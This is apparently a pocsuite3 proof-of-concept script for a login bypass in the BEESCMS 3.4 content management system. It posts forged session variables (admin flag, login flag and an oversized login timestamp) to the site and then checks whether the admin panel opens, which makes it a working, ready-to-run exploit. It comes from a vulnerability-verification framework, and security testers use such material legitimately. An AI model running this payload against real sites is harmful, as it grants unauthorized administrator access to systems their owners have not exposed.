BEESCMS 3.4 /admin.php 登录绕过漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout from urllib.parse import urljoin class DemoPOC(POCBase): vulID = '1269' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014-05-02' createDate = '2014-05-09' updateDate = '2014-05-09' references = ['http://www.wooyun.org/bugs/wooyun-2014-059180'] name = 'BEESCMS 3.4 /admin.php 登录绕过漏洞 POC' appPowerLink = 'http://www.beescms.com/' appName = 'BEESCMS' appVersion = 'v3.4#' vulType = 'Login Bypass' desc = ''' BEESCMS 在验证后台登陆时，由于时间戳判断错误，导致登陆绕过 ''' samples = [] install_requires = [''] def _verify(self): result = {} try: s = requests.Session() index_url = urljoin(self.url, '/index.php') headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17' } data = '_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=300000000000000000000000\r\n' s.post(index_url, data=data, headers=headers) login_url = urljoin(self.url, '/admin/admin.php') resp = s.post(login_url, data=data, headers=headers) if 'admin_form.php?action=form_list&nav=list_order' in resp.text and 'admin_main.php?nav=main' in resp.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url except Exception as e: logger.error(str(e)) return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)